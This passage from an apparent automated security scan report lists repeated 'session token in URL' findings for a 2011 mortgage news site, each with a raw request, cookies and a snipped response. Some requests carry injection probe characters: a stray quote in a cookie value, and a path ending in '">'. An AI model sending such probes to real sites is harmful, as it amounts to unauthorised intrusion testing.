Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.69. http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/08/upside-down-but-still-on-a-good-path/41162/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/08/upside-down-but-still-on-a-good-path/41162/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41162>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:08:23 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.70. http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/13/late-o-c-mortgage-payments-drop/41334/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/13/late-o-c-mortgage-payments-drop/41334/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41334>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:08:08 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.71. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41340>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:08:02 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.72. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41384>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:49 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.73. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41318>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:47 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.74. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/25/foreclosures-down-31-in-state/41514/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/25/foreclosures-down-31-in-state/41514/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41514>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:44 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.75. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/26/7900-o-c-homes-seized-in-2010/41532/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/26/7900-o-c-homes-seized-in-2010/41532/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41532>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:38 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 114290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.76. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41590>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:31 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.77. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/29/couple-might-be-better-off-with-short-sale/41502/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/29/couple-might-be-better-off-with-short-sale/41502/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41502>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:38 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.78. http://mortgage.ocregister.com/2011/02/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/02/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 68370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.79. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:06:36 +0000
Cache-Control: max-age=252, must-revalidate
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41668>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 83211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.80. http://mortgage.ocregister.com/feeda71cd">